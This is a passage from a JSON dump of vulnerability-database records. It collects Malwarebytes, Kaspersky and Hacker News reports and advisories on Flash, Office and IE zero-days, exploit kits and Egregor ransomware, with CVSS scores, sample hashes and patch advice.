[here](<https://helpx.adobe.com/security/products/acrobat/apsb18-09.html>), while Microsoft's (CVE-2018-8120) is [here](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-8120>).\n\nThe post [Adobe Reader zero-day discovered alongside Windows vulnerability](<https://blog.malwarebytes.com/threat-analysis/2018/05/adobe-reader-zero-day-discovered-alongside-windows-vulnerability/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-05-15T18:44:14", "type": "malwarebytes", "title": "Adobe Reader zero-day discovered alongside Windows vulnerability", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4878", "CVE-2018-4990", "CVE-2018-8120", "CVE-2018-8174"], "modified": "2018-05-15T18:44:14", "id": "MALWAREBYTES:6C5219B55CB625F7D9D16F7CD92E526C", "href": "https://blog.malwarebytes.com/threat-analysis/2018/05/adobe-reader-zero-day-discovered-alongside-windows-vulnerability/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-06-13T00:01:17", "description": "Since our last [report](<https://blog.malwarebytes.com/threat-analysis/2018/03/exploit-kits-winter-2018-review/>) on exploit kits, there have been some new developments with the wider adoption of the [February Flash zero-day](<https://blog.malwarebytes.com/cybercrime/2018/02/new-flash-player-zero-day-comes-inside-office-document/>), as well as the inclusion of a new exploit for [Internet Explorer](<https://blog.malwarebytes.com/threat-analysis/2018/05/internet-explorer-zero-day-browser-attack/>). We have not seen that many changes in the drive-by landscape for a long time, although these are the results of improvements closely tied to malspam campaigns and exploits embedded within Microsoft Office.\n\nSince both Flash and the VBScript engine are pieces of software that can be leveraged for web-based attacks, it was only natural to see their integration into exploit kits. While Internet Explorer is not getting any younger, [CVE-2018-8174](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8174>) brings an update to an otherwise 2-year-old vulnerability ([CVE-2016-0189](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0189>)), which is still used in some drive-by campaigns. As far as Flash is concerned, [CVE-2018-4878](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4878>) has been adopted by almost all exploits kits. At the time of this writing, a newer Flash vulnerability ([CVE-2018-5002](<https://helpx.adobe.com/security/products/flash-player/apsb18-19.html>)) is available but has not been spotted in any EK so far.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/06/CVEs_.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/06/CVEs_.png> \"\" )\n\n### RIG\n\nRIG exploit kit remains the most commonly observed EK in the wild, with several different campaigns in action. RIG was the [first to include the new VBScript engine exploit](<https://twitter.com/kafeine/status/999909946496962560>) (CVE-2018-8174) in IE only days after a [Proof of Concept](<https://github.com/smgorelik/Windows-RCE-exploits/tree/master/Web/VBScript>) became publicly available, on top of [adding CVE-2018-4878](<https://twitter.com/kafeine/status/983430384263327744>). RIG has pushed various payloads such as [Bunitu](<https://traffic.moe/2018/04/19/index.html>), [Ursnif](<https://traffic.moe/2018/05/16/index.html>), and the popular [SmokeLoader](<https://traffic.moe/2018/04/25/index.html>).\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/06/RIG_EK.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/06/RIG_EK.png> \"\" )\n\n### GrandSoft\n\nGrandSoft is an IE-only exploit kit which is observed in a smaller range of distribution campaigns, mostly via malvertising on adult sites. In comparison to its counterparts, GrandSoft is still relying on the older Internet Explorer exploit (CVE-2016-0189) and lacks the obfuscation we normally see in landing pages. Some payloads pushed by GrandSoft include the [AZORult stealer](<https://traffic.moe/2018/04/11/index.html>).\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/06/GrandSoft_EK.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/06/GrandSoft_EK.png> \"\" )\n\n### Magnitude\n\nThe South Korea\u2013focused exploit kit is back to using its trusted EK Magniber after having a [short stint with GandCrab ransomware](<https://blog.malwarebytes.com/threat-analysis/2018/04/magnitude-exploit-kit-switches-gandcrab-ransomware/>). Magnitude [added Flash](<https://twitter.com/kafeine/status/980505556715786242>) (CVE-2018-4878) and [went on to integrate IE's CVE-2018-8174](<https://twitter.com/kafeine/status/1002881951060160512>) after a hiatus of about a week with no activity. With its own Magnigate filtering, Base64-encoded landing page and fileless payload, Magnitude is one of the more sophisticated exploit kits on the market.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/06/Magnitude_EK.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/06/Magnitude_EK.png> \"\" )\n\n### GreenFlash Sundown\n\nThe elusive GreenFlash Sundown continues to strike via compromised OpenX ad servers. Although it is usually seen distributing the Hermes ransomware, 360 Total Security observed a [cryptocurrency miner via several Chinese websites](<https://blog.360totalsecurity.com/en/incoming-multiple-popular-websites-attacked-cryptocurrency-mining-via-greenflash-sundown-exploit-kit/>) running a vulnerable OpenX version. The ad banner used by GF Sundown in this attack, as well as some we documented before, is a Korean language picture that [hides CVE-2018-4878](<https://twitter.com/kafeine/status/972427859909316608>) using [steganography](<https://en.wikipedia.org/wiki/Steganography>).\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/06/GreenFlash_Sundown_EK.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/06/GreenFlash_Sundown_EK.png> \"\" )\n\n### A busy 2018\n\nThere is no doubt that the recent influx of zero-days has given exploit kits a much-needed boost. We did notice an increase in RIG EK campaigns, which probably resulted in higher than usual successful loads for its operators. While attackers are concentrating on Microsoft Office\u2013related exploits, we are observing a cascading effect into exploit kits.\n\nSo far, 2018 has been busier than usual with the discoveries of several directly applicable zero-days, and we can expect to see more in the coming months. For instance, we have already witnessed back-to-back Flash zero-days where attackers are capitalizing on ActionScript vulnerabilities.\n\n### Mitigation\n\nWe tested these exploit kits against [Malwarebytes](<https://www.malwarebytes.com/pricing/>), and they were all blocked thanks to our signature-less anti-exploit engine:\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/06/EKs_Spring_2018.gif)](<https://blog.malwarebytes.com/wp-content/uploads/2018/06/EKs_Spring_2018.gif> \"\" )\n\n_Hashes for samples referenced in this post:_\n\n**RIG**\n \n \n 8CA1DEDCED7332AEDC94291F8DAA82E0837A1EFC612B581DD13165B29F2A6DBB \n 21358ACDEB60C456BC36B8E3481BF66CC5F4167D5994F097F71798341B9119FB \n 560031AC4C947B1E168704CA5E323BF00A801E2320E1F0FFFE08392179D38391 \n AC1FF2B2A18931C17A5D9D0305CE72CC69C1688DFC2BDF4BF74AA9E27123BFFD\n\n**GrandSoft**\n \n \n E659DD280514DD81BF8923315BD503E8781EB8CE7684F4888A838CF2A8B2ADF0\n\n**Magnitude** (dumped from memory with [PE-Sieve](<https://github.com/hasherezade/pe-sieve>))\n \n \n 9491E8B30D37CB3BD0D206021EBE7396CA17BE3C8FBED2AC6DCE89D3CE0CAA27\n\n**GreenFlash** (dumped from memory with [PE-Sieve](<https://github.com/hasherezade/pe-sieve>))\n \n \n e600dec30c0f5080eab3d15f1210334429c3db0dd6a90f1e755709783ace6e85\n\nThe post [Exploit kits: Spring 2018 review](<https://blog.malwarebytes.com/cybercrime/2018/06/exploit-kits-spring-2018-review/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-06-12T19:04:14", "type": "malwarebytes", "title": "Exploit kits: Spring 2018 review", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0189", "CVE-2018-4878", "CVE-2018-5002", "CVE-2018-8174"], "modified": "2018-06-12T19:04:14", "id": "MALWAREBYTES:29082210E17AE80B08D8FF58AED79F23", "href": "https://blog.malwarebytes.com/cybercrime/2018/06/exploit-kits-spring-2018-review/", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-12-15T20:23:18", "description": "### What is Egregor?\n\nEgregor ransomware is a relatively new ransomware (first spotted in September 2020) that seems intent on making its way to the top right now. Egregor is considered a variant of [Ransom.Sekhmet](<https://blog.malwarebytes.com/detections/ransom-sekhmet/>) based on similarities in obfuscation, API-calls, and the ransom note.\n\nAs we've reported in the past, affiliates that were using Maze ransomware started moving over to Egregor even before the [Maze gang officially announced they were calling it quits](<https://blog.malwarebytes.com/ransomware/2020/11/maze-ransomware-gang-announces-retirement/>). Egregor has already targeted some well-known victims like Barnes & Noble, Kmart and Ubisoft.\n\n### How does Egregor spread?\n\nThe primary distribution method for Egregor is Cobalt Strike. Targeted environments are initially compromised through various means ([RDP probing](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2020/10/brute-force-attacks-increasing/>), [phishing](<https://blog.malwarebytes.com/glossary/phishing/>)) and once the [Cobalt Strike](<https://blog.malwarebytes.com/threat-analysis/2020/06/multi-stage-apt-attack-drops-cobalt-strike-using-malleable-c2-feature/>) beacon payload is established and persistent, it is then used to deliver and launch the Egregor payloads.\n\n![part 1 Egregor ransom note](https://blog.malwarebytes.com/wp-content/uploads/2020/12/what_happened-1.png)_First part of the _Egregor ransom note\n\nBut since Egregor is a ransomware-as-a-service (RaaS) operation with multiple affiliates, the delivery and weaponization tactics can vary. We've also seen it being spread via phishing emails recently. The attack typically unfolds in two steps: initial compromise with email lure that drops [Qakbot](<https://blog.malwarebytes.com/detections/worm-qakbot/>), followed by the actual Egregor ransomware. The latter is deployed manually by the attackers who have previously gained access as a result of the initial compromise.\n\n![Egregor DocuSign mail](https://blog.malwarebytes.com/wp-content/uploads/2020/12/Docusign_phishing_mail-600x289.png)\n\nThere have also been some reports of Egregor utilizing [CVE-2020-0688](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0688>) (a remote code execution flaw in Microsoft Exchange). Some sources also report the possible exploitation of [CVE-2018-8174](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8174>) (VBScript Engine), [CVE](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4878>)[-2018-4878](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4878>) (Adobe Flash Player), and [CVE-2018-15982](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-15982>) (Adobe Flash Player).\n\nThe most common attack method seems to entail an initial spray-and-pray tactic, after which the threat actors make a selection of the available openings. They will obviously go for the easiest and most profitable ones based on primary reconnaissance data from the first stage of the attack. They will then try to enlarge their foothold on the breached network and look for the data and servers that are most critical for the victim. This will give the attackers extra leverage and a bigger chance to cash in their ransom demand.\n\nEgregor does not seem to have a geographical preference, even though Sekhmet has seemed to focus on the US in the past 7 weeks.\n\n![Sekhmet attacks per country](https://blog.malwarebytes.com/wp-content/uploads/2020/12/sekhmet_per_country.png)_Sekhmet attacks in the last 7 weeks per country_\n\n### Egregor threatens to leak exfiltrated data\n\nAccording to the ransom note, if the ransom is not paid by the company within 3 days, and aside from leaking part of the stolen data, the attackers will announce the breach through mass media so the company's partners and clients will know that the company was victimized.\n\n![Part 2 Egregor ransom note](https://blog.malwarebytes.com/wp-content/uploads/2020/12/threaten_to_publish-600x207.png)_Part 2 of the Egregor ransom note_\n\nIn all three the cases we mentioned earlier, the attackers published information on a leak site showing that they had accessed files during the attack, but didn't necessarily reveal source code or anything particularly sensitive.\n\n![Egregor victim list](https://blog.malwarebytes.com/wp-content/uploads/2020/12/listing-600x595.png)_Announcements of leaked data on the Egregor website_\n\n### Education by the hands-on experts\n\nA very typical trait of the Egregor ransomware is that the attackers offer to educate their victims in order to help them escape future attacks.\n\n![Part 3 Egregor ransom note](https://blog.malwarebytes.com/wp-content/uploads/2020/12/Receive_at_payment-600x155.png)_Part 3 of the Egregor ransom note_\n\nCybersecurity advice is promised to those victims that pay the ransom as an extra bonus. What these recommendations look like is unknown at the time of writing. A truthful explanation about how the victim in question was infected, infiltrated, and how data was exfiltrated would certainly help in a forensic investigation of the incident.\n\n### Egregor victim Randstad\n\nOne of the latest victims seems to be Netherlands-based Randstad, one of the largest recruitment- and head-hunting agencies in the world. In its [press release](<https://tools.eurolandir.com/tools/Pressreleases/GetPressRelease/?ID=3845464&lang=en-GB&companycode=nl-rand&v=ticker>), Randstad specifically calls out Egregor as the attacker.\n\n\u201cWe believe the incident started with a phishing email that initiated malicious software to be installed,\u201d a Randstad spokesperson said in an email.\n\n![Randstad listing](https://blog.malwarebytes.com/wp-content/uploads/2020/12/data-leak-site-600x334.png)_The listing on the Egregor site confirms the attack_\n\nThe press release confirms the stolen data but is unclear about the exact content.\n\n> \u201cTo date, our investigation has revealed that the Egregor group obtained unauthorized and unlawful access to our global IT environment and to certain data, in particular related to our operations in the US, Poland, Italy and France. They have now published what is claimed to be a subset of that data.\u201d\n\nDepending on the stolen data, and given the line of business, the content could be very sensitive and confidential. According to Randstad, the company was able to limit the impact, and the stolen data are in particular related to their operations in the US, Poland, Italy and France.\n\nThird party cybersecurity and forensic experts were engaged to assist with the investigation and remediation of the incident.\n\n### IOCs\n\n**Tor Onion URLs:**\n\n * egregorwiki.top\n * wikiegregor.top\n * sekhmet.top\n * sekhmetleaks.top\n\n**SHA256 hashes:**\n\n * 4c9e3ffda0e663217638e6192a093bbc23cd9ebfbdf6d2fc683f331beaee0321\n * aee131ba1bfc4b6fa1961a7336e43d667086ebd2c7ff81029e14b2bf47d9f3a7\n\n**Ransom note:**\n\nRECOVER-FILES.txt (some parts of the ransom note can be seen in the article)\n\nThe post [Threat profile: Egregor ransomware is making a name for itself](<https://blog.malwarebytes.com/ransomware/2020/12/threat-profile-egregor-ransomware-is-making-a-name-for-itself/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-12-15T13:58:58", "type": "malwarebytes", "title": "Threat profile: Egregor ransomware is making a name for itself", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15982", "CVE-2018-4878", "CVE-2018-8174", "CVE-2020-0688"], "modified": "2020-12-15T13:58:58", "id": "MALWAREBYTES:5899EF0CF34937AFA2DB4AB02D282DF6", "href": "https://blog.malwarebytes.com/ransomware/2020/12/threat-profile-egregor-ransomware-is-making-a-name-for-itself/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2022-04-18T18:25:44", "description": "### *Detect date*:\n02/01/2018\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple use-after-free vulnerabilitires was found in Adobe Flash Player. By exploiting these vulnerabilities malicious users can execute arbitrary code. These vulnerabilities can be exploited remotely via a specially crafted Office documents with embedded malicious Flash content.\n\n### *Affected products*:\nAdobe Flash Player earlier than 28.0.0.161\n\n### *Solution*:\nUpdate to the latest version \n[Download Adobe Flash Player](<https://get.adobe.com/ru/flashplayer/>)\n\n### *Original advisories*:\n[APSB18-03](<https://helpx.adobe.com/security/products/flash-player/apsb18-03.html>) \n[APSA18-01](<https://helpx.adobe.com/security/products/flash-player/apsa18-01.html>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Adobe Flash Player ActiveX](<https://threats.kaspersky.com/en/product/Adobe-Flash-Player-ActiveX/>)\n\n### *CVE-IDS*:\n[CVE-2018-4878](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4878>)7.5Critical\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-02-01T00:00:00", "type": "kaspersky", "title": "KLA11191 Multiple use-after-free vulnerabilities in Adobe Flash Player", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4878"], "modified": "2022-01-18T00:00:00", "id": "KLA11191", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11191/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-18T11:15:22", "description": "### *Detect date*:\n01/09/2017\n\n### *Severity*:\nWarning\n\n### *Description*:\nOut-of-bounds read vulnerability in Adobe Flash Player can be exploited locally to obtain sensitive information.\n\n### *Affected products*:\nAdobe Flash Player versions earlier than 28.0.0.137\n\n### *Solution*:\nUpdate to the latest version \n[Download Adobe Flash Player](<https://get.adobe.com/ru/flashplayer/>)\n\n### *Original advisories*:\n[APSB18-01](<https://helpx.adobe.com/security/products/flash-player/apsb18-01.html>) \n\n\n### *Impacts*:\nOSI \n\n### *Related products*:\n[Adobe Flash Player ActiveX](<https://threats.kaspersky.com/en/product/Adobe-Flash-Player-ActiveX/>)\n\n### *CVE-IDS*:\n[CVE-2018-4871](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4871>)5.0Critical\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-01-09T00:00:00", "type": "kaspersky", "title": "KLA11171 OSI vulnerability in Adobe Flash Player", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4871"], "modified": "2020-06-18T00:00:00", "id": "KLA11171", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11171/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "thn": [{"lastseen": "2018-02-02T09:52:46", "description": "[![flash-zero-dy-exploit](https://1.bp.blogspot.com/-N0rBFsKfvJg/WnP_Z6mQQUI/AAAAAAAAvqA/Atki8zSxvMMXzU6BgC-RDnm6DGfrFf-kACLcBGAs/s1600-e20/flash-zero-dy-exploit.png)](<https://1.bp.blogspot.com/-N0rBFsKfvJg/WnP_Z6mQQUI/AAAAAAAAvqA/Atki8zSxvMMXzU6BgC-RDnm6DGfrFf-kACLcBGAs/s1600-e20/flash-zero-dy-exploit.png>)\n\nAnother reason to uninstall Adobe Flash Player\u2014a new zero-day Flash Player exploit has reportedly been spotted in the wild by North Korean hackers. \n \nSouth Korea's Computer Emergency Response Team (KR-CERT) [issued](<https://www.krcert.or.kr/data/secNoticeView.do?bulletin_writing_sequence=26998>) an alert Wednesday for a new Flash Player zero-day vulnerability that's being actively exploited in the wild by North Korean hackers to target Windows users in South Korea. \n \nSimon Choi of South Korea-based cybersecurity firm Hauri first [reported](<https://twitter.com/issuemakerslab/status/959006385550778369>) the campaign on Twitter, saying the North Korean hackers have been using the Flash zero-day against South Koreans since mid-November 2017. \n \nAlthough Choi did not share any malware sample or details about the vulnerability, the researcher said the attacks using the new Flash zero-day is aimed at South Korean individuals who focus on researching North Korea. \n \nAdobe also released an [advisory](<https://helpx.adobe.com/security/products/flash-player/apsa18-01.html>) on Wednesday, which said the zero-day is exploiting a critical 'use-after-free' vulnerability (CVE-2018-4878) in its Flash media software that leads to remote code execution. \n\n\n[![flash-zero-dy-exploit](https://1.bp.blogspot.com/--1vyZSg6wok/WnP-KAgrsvI/AAAAAAAAvp0/Ex5zBHKR2egnfF27QpGfeR_YbETdU66hwCLcBGAs/s1600-e20/adobe-flash-player-zero-day-exploit.png)](<https://1.bp.blogspot.com/--1vyZSg6wok/WnP-KAgrsvI/AAAAAAAAvp0/Ex5zBHKR2egnfF27QpGfeR_YbETdU66hwCLcBGAs/s1600-e20/adobe-flash-player-zero-day-exploit.png>)\n\nThe critical vulnerability affects Adobe Flash Player version 28.0.0.137 and earlier versions for: \n\n\n * Desktop Runtime (Win/Mac/Linux)\n * Google Chrome (Win/Mac/Linux/Chrome OS)\n * Microsoft Edge and Internet Explorer 11 (Win 10 & 8.1)\n \n\n\n> \"Adobe is aware of a report that an exploit for CVE-2018-4878 exists in the wild, and is being used in limited, targeted attacks against Windows users,\" the advisory said. \"These attacks leverage Office documents with embedded malicious Flash content distributed via email. **_Adobe will address this vulnerability in a release planned for the week of February 5._**\"\n\n \nTo exploit the vulnerability, all an attacker need to do is trick victims into opening Microsoft Office documents, web pages, or spam messages that contain a maliciously crafted Adobe Flash file. \n \nThe vulnerability can be leveraged by hackers to take control of an affected computer. \n \nChoi also posted a screenshot to show that the Flash Player zero-day exploit has been delivered via malicious Microsoft Excel files. \n \nAdobe said in its advisory that the company has planned to address this vulnerability in a \"release planned for the week of February 5,\" through KR-CERT advises users to disable or completely remove the buggy software.\n", "cvss3": {}, "published": "2018-02-01T19:10:00", "type": "thn", "title": "(Unpatched) Adobe Flash Player Zero-Day Exploit Spotted in the Wild", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-4878"], "modified": "2018-02-02T06:10:47", "id": "THN:3BC4F7FE3170D82B2C8328638552D1D3", "href": "https://thehackernews.com/2018/02/flash-zero-day-exploit.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-01-27T09:17:17", "description": "[![Microsoft Issues Security Patches Critical Vulnerabilities](https://2.bp.blogspot.com/-beOJSQDFs8E/WlWzGhDEy1I/AAAAAAAAvao/HtLyZwdkdO0s6swi2W8MGUFOiL97VBjtACLcBGAs/s1600/microsoft-windows-update.png)](<https://2.bp.blogspot.com/-beOJSQDFs8E/WlWzGhDEy1I/AAAAAAAAvao/HtLyZwdkdO0s6swi2W8MGUFOiL97VBjtACLcBGAs/s1600/microsoft-windows-update.png>)\n\nIf you think that only CPU updates that address this year's major security flaws\u2014[Meltdown and Spectre](<https://thehackernews.com/2018/01/meltdown-spectre-patches.html>)\u2014are the only ones you are advised to grab immediately, there are a handful of major security flaws that you should pay attention to. \n \nMicrosoft has issued its first Patch Tuesday for 2018 to address 56 CVE-listed flaws, including a zero-day vulnerability in MS Office related that had been actively exploited by several threat groups in the wild. \n \nSixteen of the security updates are listed as critical, 38 are rated important, one is rated moderate, and one is rated as low in severity. The updates address security flaws in Windows, Office, Internet Explorer, Edge, ChakraCore, ASP.NET, and the .NET Framework. \n \nThe zero-day vulnerability ([CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>)), described by Microsoft as a memory corruption flaw in Office, is already being targeted in the wild by several threat actor groups in the past few months. \n \nThe vulnerability, discovered by several researchers from Chinese companies Tencent and Qihoo 360, ACROS Security's 0Patch Team, and Check Point Software Technologies, can be exploited for remote code execution by tricking a targeted user into opening a specially crafted malicious Word file in MS Office or WordPad. \n \nAccording to the company, this security flaw is related to CVE-2017-11882\u2014a 17-year-old [vulnerability in the Equation Editor](<https://thehackernews.com/2017/11/microsoft-office-rce-exploit.html>) functionality (EQNEDT32.EXE), which Microsoft addressed in November. \n \nWhen researchers at 0Patch were analysing CVE-2017-11882, they discovered a new, related vulnerability (CVE-2018-0802). More details of CVE-2018-0802 can be found in a [blog post](<https://research.checkpoint.com/another-office-equation-rce-vulnerability/>) published by Check Point. \n \nBesides CVE-2018-0802, the company has addressed nine more remote code execution and memory disclosure vulnerabilities in MS Office. \n \nA spoofing vulnerability (CVE-2018-0819) in Microsoft Outlook for MAC, which has been listed as publicly disclosed ([Mailsploit attack](<https://thehackernews.com/2017/12/email-spoofing-client.html>)), has also addressed by the company. The vulnerability does not allow some versions Outlook for Mac to handle the encoding and display of email addresses properly, causing antivirus or anti-spam scanning not to work as intended. \n \nMicrosoft also addressed a certificate validation bypass vulnerability (CVE-2018-0786) in .NET Framework (and .NET Core) that could allow malware authors to show their invalid certificates as valid. \n \n\"An attacker could present a certificate that is marked invalid for a specific use, but the component uses it for that purpose,\" describes Microsoft. \"This action disregards the Enhanced Key Usage taggings.\" \n \nThe company has also patched a total of 15 vulnerabilities in the scripting engine used by Microsoft Edge and Internet Explorer. \n \nAll these flaws could be exploited for remote code execution by tricking a targeted user into opening a specially-crafted webpage that triggers a memory corruption error, though none of these has been exploited in the wild yet. \n \nMeanwhile, Adobe has [patched](<https://helpx.adobe.com/security/products/flash-player/apsb18-01.html>) a single, out of bounds read flaw (CVE-2018-4871) this month that could allow for information disclosure, though no active exploits have been seen in the wild. \n \nUsers are strongly advised to apply security patches as soon as possible to keep hackers and cybercriminals away from taking control of their computers. \n \nFor installing security updates, simply head on to Settings \u2192 Update & security \u2192 Windows Update \u2192 Check for updates, or you can install the updates manually.\n", "cvss3": {}, "published": "2018-01-09T19:35:00", "type": "thn", "title": "Microsoft Releases Patches for 16 Critical Flaws, Including a Zero-Day", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2018-0802", "CVE-2018-0819", "CVE-2018-4871", "CVE-2018-0786"], "modified": "2018-01-11T07:11:17", "id": "THN:ED087560040A02BCB1F68DE406A7F577", "href": "https://thehackernews.com/2018/01/microsoft-security-patch.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:15", "description": "\nFlash ActiveX 28.0.0.137 - Code Execution (2)", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": 